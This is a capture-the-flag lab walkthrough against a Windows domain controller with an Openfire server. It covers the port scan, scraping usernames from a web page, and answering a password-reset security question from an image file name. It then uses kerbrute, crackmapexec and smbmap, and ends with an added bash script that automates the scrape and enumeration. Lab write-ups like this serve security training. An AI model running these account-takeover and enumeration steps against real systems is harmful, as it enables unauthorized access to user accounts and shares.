nmap 10.10.110.170 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-11 16:48:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5229/tcp open jaxflow?
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5263/tcp open ssl/jabber
5269/tcp open xmpp Wildfire XMPP Client
5270/tcp open ssl/xmpp Wildfire XMPP Client
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5276/tcp open ssl/jabber
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7070/tcp open http Jetty 9.4.18.v20190429
7443/tcp open ssl/http Jetty 9.4.18.v20190429
7777/tcp open socks5 (No authentication; connection failed)
9090/tcp open zeus-admin?
9091/tcp open ssl/xmltec-xmlmail?
9389/tcp open mc-nmf .NET Message Framing
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
We have a large number of ports open on the target system: the usual domain-controller services (Kerberos, LDAP, SMB, WinRM on 5985) plus an Openfire XMPP server and its Jetty admin console on 7070/7443. First we take a look at port 80.
Part way down the page we find some employee information.
Viewing the page source we see a list of usernames.
From the source we also pick up the FQDN of fire.windcorp.thm.
Running the discovered usernames through kerbrute's user enumeration against the domain controller confirms that some of them are valid user accounts.
A further look through the main web page shows a password-reset function that relies on security questions.
We already know Lily's username, lilyle, from the page source, and the same source names her profile image "LilyleandSparky.jpg", which gives away the answer to her security questions.
After entering that information we are given a new password for the user lilyle.
Testing those credentials with crackmapexec confirms they are valid.
Running smbmap with lilyle's account then shows some readable shares.
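The steps above (scrape the page source for usernames and image names, enumerate with kerbrute, validate with crackmapexec, list shares with smbmap) as one script. This is an added example for the writeup, not the author's own tooling: the HTML fragment is constructed, the markup layout it parses (one class="username" element and one <img> per employee) is an assumption, and the DC, domain and page URL are taken from the scan but can be overridden with DC and DOMAIN.

```bash
#!/bin/sh
# Added example (not from the original writeup): scrape an employee page for
# usernames and profile-image names, then feed the usernames to kerbrute,
# validate a recovered password with crackmapexec and list shares with smbmap.
# SAMPLE_HTML is constructed; the markup layout it assumes and the DC/DOMAIN
# defaults are assumptions for this example.
set -eu

# Constructed page-source fragment. Only lilyle appears in the writeup; the
# other two entries are made up so the parsing runs over several records.
SAMPLE_HTML='<div class="employee"><img src="images/LilyleandSparky.jpg"><span class="username">lilyle</span></div>
<div class="employee"><img src="images/jdoe.jpg"><span class="username">jdoe</span></div>
<div class="employee"><img src="images/asmith.jpg"><span class="username">asmith</span></div>'

# One username per line from page source on stdin. Splitting on "<" first
# means several elements on a single line are still handled.
extract_usernames() {
    tr '<' '\n' | sed -n 's/^span class="username">\(.*\)$/\1/p'
}

# Profile-image basenames (path and extension stripped) from page source on
# stdin. A name like "LilyleandSparky" is what leaks a security answer.
extract_image_names() {
    tr '<' '\n' \
        | sed -n 's/^img src="\([^"]*\)".*/\1/p' \
        | sed 's|.*/||; s/\.[^.]*$//'
}

DC="${DC:-10.10.110.170}"         # domain controller from the scan
DOMAIN="${DOMAIN:-windcorp.thm}"  # domain from the LDAP banner

# Kerberos pre-auth based user enumeration: a valid user and an invalid user
# get different KDC errors, and no failed logon is recorded for the account.
enum_users() { kerbrute userenum --dc "$DC" -d "$DOMAIN" "$1"; }

# Validate a username/password pair over SMB.
check_creds() { crackmapexec smb "$DC" -u "$1" -p "$2"; }

# List shares and their permissions with the validated account.
list_shares() { smbmap -H "$DC" -d "$DOMAIN" -u "$1" -p "$2"; }

# Offline part: show what the scrape recovers from the constructed sample.
printf '%s\n' "$SAMPLE_HTML" | extract_usernames
printf '%s\n' "$SAMPLE_HTML" | extract_image_names

# Live part, only when LIVE=1 and PASSWORD are set, e.g.
#   LIVE=1 PASSWORD='<password from the reset form>' sh enum.sh
if [ -n "${LIVE:-}" ]; then
    curl -s "http://$DC/" | extract_usernames > users.txt
    enum_users users.txt
    check_creds lilyle "${PASSWORD:?set PASSWORD to the reset password}"
    list_shares lilyle "$PASSWORD"
fi
```

Run it without LIVE to see the scrape alone; with LIVE=1 it pulls the real page from the DC and runs the three tools in order. The scraping runs first on purpose: kerbrute only tells you which of your guesses exist, so the quality of the username list decides what it finds.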